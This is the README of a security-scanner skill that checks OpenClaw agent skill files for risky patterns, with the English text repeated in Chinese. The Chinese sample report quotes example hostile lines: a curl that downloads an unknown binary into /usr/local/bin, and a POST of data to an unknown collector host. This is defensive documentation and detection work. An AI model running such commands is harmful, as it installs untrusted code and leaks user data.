Security Scanner
Description
A security-focused skill that analyzes OpenClaw SKILL.md files and skill packages for potential security risks, malicious patterns, and suspicious behaviors. This tool helps protect your system by detecting:
- - Hidden external downloads or executables
- Suspicious API calls and endpoints
- Dangerous file system operations
- Obfuscated or encoded commands
- Unusual prerequisite requirements
- Known malicious patterns
Why this matters: This scanner helps you review skills before installation by flagging potentially suspicious instruction patterns.
Features
- - ✅ Pattern Detection: Identifies suspicious code patterns and behaviors
- ✅ Prerequisite Analysis: Validates required dependencies and downloads
- ✅ API Endpoint Validation: Checks for suspicious external connections
- ✅ File System Auditing: Detects dangerous file operations
- ✅ Encoding Detection: Flags base64, hex, and other obfuscation attempts
- ✅ Risk Scoring: Assigns risk levels (LOW, MEDIUM, HIGH, CRITICAL)
- ✅ Detailed Reports: Provides clear explanations of findings
- ✅ Whitelist Support: Configure trusted domains and patterns
How It Works
This is an OpenClaw skill (not a standalone program). When you ask the agent to scan a skill file:
- 1. The agent reads this security-scanner skill to learn what patterns to look for
- The agent reads the skill file you want to scan
- The agent analyzes the instructions and reports findings
- You manually review the flagged items
Note: The included scanner.js file can also be run directly with Node.js 18+ if you prefer command-line usage.
Installation
Install via ClawHub or add to your OpenClaw skills directory.
For command-line usage (optional):
�CODEBLOCK0
Configuration
Create a .security-scanner-config.json in your OpenClaw directory (optional):
�CODEBLOCK1
Usage
Scan a SKILL.md file
�CODEBLOCK2
Scan before installation
�CODEBLOCK3
Important: If you ask Claude to download a skill from the internet first, that download step will use network access (though the scanner itself runs offline).
Batch scan all installed skills
�CODEBLOCK4
What It Detects
🔴 CRITICAL Risks
- - Shell command injection attempts
- External executable downloads (curl/wget binaries)
- Suspicious eval() or exec() usage
- Credential harvesting patterns
- Known malware signatures
🟠 HIGH Risks
- - Unvalidated external API calls
- File system write access to sensitive directories
- Base64 or hex encoded commands
- Requests to unknown domains
- Privilege escalation attempts
🟡 MEDIUM Risks
- - Extensive file system read access
- Network requests without HTTPS
- Large numbers of dependencies
- Unusual prerequisite requests
- Deprecated or vulnerable packages
🟢 LOW Risks
- - Minor code quality issues
- Missing error handling
- Incomplete documentation
- Non-critical warnings
⚠️ IMPORTANT: False Positives & Limitations
This Scanner WILL Flag Legitimate Patterns
The scanner uses regex patterns that may match innocent code. Common false positives:
- - ✗ Backticks in markdown - Code examples using �INLINECODE2
- ✗ Template strings - Documentation showing
${variable} syntax - ✗ Base64 examples - Skills demonstrating encoding/decoding
- ✗ Package managers - Legitimate
npm install or pip install commands - ✗ GitHub URLs - Links to �INLINECODE6
What This Actually Scans
Skills are markdown instruction files, not executable code. This scanner:
- - ✅ Reads the markdown text of skill files
- ✅ Looks for instruction patterns that might be concerning
- ✅ Flags items for your manual review
- ❌ Does NOT scan for executable malware (skills aren't programs)
- ❌ Does NOT provide definitive verdicts
Your Responsibility
YOU must review all flagged items in context. Ask yourself:
- - Does this pattern make sense for what the skill does?
- Is the author trustworthy?
- Are the instructions clear and reasonable?
When in doubt, ask the skill author or community.
Output Format
�CODEBLOCK5
Example Scenarios
Scenario 1: Clean Skill
�CODEBLOCK6
Scenario 2: Suspicious Skill
�CODEBLOCK7
Scenario 3: Minor Issues
�CODEBLOCK8
Security Guarantees
This scanner itself is designed with security in mind:
- - ✅ No Network Access: The scanner itself runs completely offline (but if you ask Claude to download a skill file first, that download uses network)
- ✅ No External Dependencies: Pure JavaScript/Node.js
- ✅ Read-Only: Never modifies files being scanned
- ✅ No Telemetry: Doesn't send data anywhere
- ✅ Open Source: All code is auditable
- ✅ Sandboxed: Doesn't execute code from scanned skills
False Positives
The scanner may flag legitimate uses of certain patterns. Common false positives:
- - npm/pip installs: Legitimate package managers may trigger warnings
- GitHub URLs: Raw GitHub content URLs are generally safe
- Config files: Skills that write to config files may be flagged
- Log files: Creating log files may trigger file system warnings
Use judgment and review flagged items in context.
Limitations
- - Cannot detect zero-day exploits or novel attack vectors
- May miss sophisticated obfuscation techniques
- Requires human judgment for final decision
- Cannot scan encrypted or compiled code
- Pattern-based detection can have false positives
This tool is a helpful first line of defense, but not a replacement for careful review.
Contributing
Found a malicious pattern not detected? Submit an issue or PR with:
- - The malicious pattern
- Example skill that uses it
- Suggested detection method
Roadmap
- - [ ] Machine learning-based pattern detection
- [ ] Integration with VirusTotal API (optional)
- [ ] Automatic skill reputation checking
- [ ] Community-sourced malware signatures
- [ ] Browser extension for ClawHub.ai scanning
- [ ] CI/CD integration for skill developers
Support
- - Report issues: https://github.com/anikrahman0/security-skill-scanner/issues
- Suggest improvements: Pull requests welcome
- Security concerns: a7604366@gmail.com
License
MIT License - Free to use, modify, and distribute
Disclaimer
This tool provides pattern-based security scanning with expected false positives. It scans instruction files (markdown), not executable code.
Critical: This scanner cannot provide definitive security verdicts. All flagged items require manual review in context. Skills are instructions for Claude to read, not programs that execute automatically.
Always review skills carefully before installation, especially those requiring system-level permissions. The authors are not responsible for any damages resulting from use of this tool or installation of scanned skills.
Remember: If a skill seems too good to be true or requests unusual permissions, it probably is suspicious. When in doubt, don't install it.安全扫描器
描述
一款专注于安全性的技能,用于分析OpenClaw SKILL.md文件和技能包中潜在的安全风险、恶意模式和可疑行为。该工具通过检测以下内容帮助保护您的系统:
- - 隐藏的外部下载或可执行文件
- 可疑的API调用和端点
- 危险的文件系统操作
- 混淆或编码的命令
- 不寻常的先决条件要求
- 已知的恶意模式
为何重要: 该扫描器通过标记潜在可疑的指令模式,帮助您在安装前审查技能。
功能特性
- - ✅ 模式检测:识别可疑的代码模式和行为
- ✅ 先决条件分析:验证所需的依赖项和下载内容
- ✅ API端点验证:检查可疑的外部连接
- ✅ 文件系统审计:检测危险的文件操作
- ✅ 编码检测:标记base64、十六进制及其他混淆尝试
- ✅ 风险评分:分配风险等级(低、中、高、严重)
- ✅ 详细报告:提供清晰的发现说明
- ✅ 白名单支持:配置可信域名和模式
工作原理
这是一个OpenClaw技能(非独立程序)。当您要求代理扫描技能文件时:
- 1. 代理读取此安全扫描器技能,了解需要查找哪些模式
- 代理读取您要扫描的技能文件
- 代理分析指令并报告发现
- 您手动审查标记的项目
注意: 如果您更喜欢命令行使用,也可以直接使用Node.js 18+运行附带的scanner.js文件。
安装
通过ClawHub安装,或添加到您的OpenClaw技能目录。
命令行使用(可选):
bash
克隆仓库
git clone https://github.com/anikrahman0/security-skill-scanner.git
cd security-skill-scanner
运行扫描器
node scanner.js path/to/SKILL.md
配置
在您的OpenClaw目录中创建.security-scanner-config.json(可选):
json
{
whitelistedDomains: [
github.com,
api.openai.com,
api.anthropic.com,
raw.githubusercontent.com
],
whitelistedCommands: [
npm install,
pip install
],
strictMode: false
}
使用方法
扫描SKILL.md文件
用户:扫描 ~/Downloads/new-skill/SKILL.md 文件是否存在安全问题
代理:[运行安全扫描并报告发现]
安装前扫描
用户:我有邮件自动化技能文件。你能扫描它是否存在安全风险吗?
[用户上传SKILL.md文件]
代理:[读取并分析技能文件,提供风险评估]
重要提示: 如果您要求Claude先从互联网下载技能,该下载步骤将使用网络访问(尽管扫描器本身离线运行)。
批量扫描所有已安装技能
用户:扫描我所有已安装的OpenClaw技能是否存在安全问题
代理:[扫描 ~/.openclaw/skills/ 中的所有技能并生成报告]
检测内容
🔴 严重风险
- - Shell命令注入尝试
- 外部可执行文件下载(curl/wget二进制文件)
- 可疑的eval()或exec()使用
- 凭证收集模式
- 已知恶意软件签名
🟠 高风险
- - 未经验证的外部API调用
- 对敏感目录的文件系统写入访问
- Base64或十六进制编码的命令
- 对未知域名的请求
- 权限提升尝试
🟡 中等风险
- - 大量文件系统读取访问
- 未使用HTTPS的网络请求
- 大量依赖项
- 不寻常的先决条件请求
- 已弃用或存在漏洞的包
🟢 低风险
- - 轻微代码质量问题
- 缺少错误处理
- 文档不完整
- 非关键警告
⚠️ 重要提示:误报与局限性
此扫描器会标记合法模式
扫描器使用正则表达式模式,可能匹配无害代码。常见误报:
- - ✗ Markdown中的反引号 - 使用反引号的代码示例
- ✗ 模板字符串 - 显示${variable}语法的文档
- ✗ Base64示例 - 演示编码/解码的技能
- ✗ 包管理器 - 合法的npm install或pip install命令
- ✗ GitHub URL - 指向raw.githubusercontent.com的链接
实际扫描内容
技能是Markdown指令文件,而非可执行代码。此扫描器:
- - ✅ 读取技能文件的Markdown文本
- ✅ 查找可能令人担忧的指令模式
- ✅ 标记项目供您手动审查
- ❌ 不扫描可执行恶意软件(技能不是程序)
- ❌ 不提供最终判定
您的责任
您必须在上下文中审查所有标记的项目。 问自己:
- - 这个模式对技能的功能有意义吗?
- 作者可信吗?
- 指令清晰合理吗?
如有疑问,请咨询技能作者或社区。
输出格式
=== 安全扫描报告 ===
技能:邮件自动化
扫描时间:2024-02-09 14:30:22
总体风险:高 ⚠️
发现:
[严重] 检测到外部二进制文件下载
位置:先决条件第45行
模式:curl https://unknown-site.com/tool -o /usr/local/bin/helper
风险:从不可信来源下载并执行外部二进制文件
建议:请勿安装 - 需要手动验证
[高] 可疑API端点
位置:execute()第89行
模式:POST到http://data-collector.xyz/log
风险:向未知第三方服务器发送数据
建议:审查发送的数据内容
[中] 未加密网络请求
位置:第102行
模式:使用HTTP而非HTTPS
风险:数据传输未加密
建议:请求HTTPS版本
摘要:
总问题数:3
严重:1
高:1
中:1
低:0
建议:❌ 请勿安装
该技能存在严重安全问题,对您的系统构成重大风险。
示例场景
场景1:安全技能
用户:扫描天气检查技能
代理:✅ 安全 - 未检测到安全问题。该技能使用标准API调用
访问api.weatherapi.com,使用正确的HTTPS且无文件系统访问。
场景2:可疑技能
用户:我应该安装生产力助手技能吗?
代理:⚠️ 警告 - 该技能尝试下载外部二进制文件并
向未知域名发出请求。风险等级:严重
建议:请勿安装
场景3:轻微问题
用户:分析笔记记录技能
代理:⚠️ 注意 - 风险等级:低
发现2个轻微问题:
- 使用HTTP而非HTTPS下载图标
- 文件路径缺少输入验证
这些问题可能可以修复。考虑联系作者。
安全保障
此扫描器本身在设计上注重安全性:
- - ✅ 无网络访问:扫描器本身完全离线运行(但如果您要求Claude先下载技能文件,该下载会使用网络)
- ✅ 无外部依赖:纯JavaScript/Node.js
- ✅ 只读:从不修改被扫描的文件
- ✅ 无遥测:不向任何地方发送数据
- ✅ 开源:所有代码均可审计
- ✅ 沙箱化:不执行扫描技能中的代码
误报
扫描器可能标记某些模式的合法使用。常见误报:
- - npm/pip安装:合法的包管理器可能触发警告
- GitHub URL:原始GitHub内容URL通常是安全的
- 配置文件:写入配置文件的技能可能被标记
- 日志文件:创建日志文件可能触发文件系统警告
请运用判断力,在上下文中审查标记的项目。
局限性
- - 无法检测零日漏洞或新型攻击向量
- 可能遗漏复杂的混淆技术
- 最终决策需要人工判断
- 无法扫描加密或编译的代码
- 基于模式的检测可能产生误报
此工具是有用的第一道防线,但不能替代仔细审查。
贡献
发现未检测到的恶意模式?提交问题或拉取请求,包含:
路线图
- - [ ] 基于机器学习的模式检测
- [ ] 与VirusTotal API集成(可选)
- [ ] 自动技能信誉检查
- [ ] 社区来源的恶意软件签名
- [ ] ClawHub.ai扫描的浏览器扩展
- [ ] 技能开发者的CI/CD集成
支持
- - 报告问题:https://github.com/anikrahman0/security-skill-scanner/issues
- 建议改进:欢迎提交拉取请求
- 安全问题:a7604366@gmail.com
许可证
MIT许可证 -
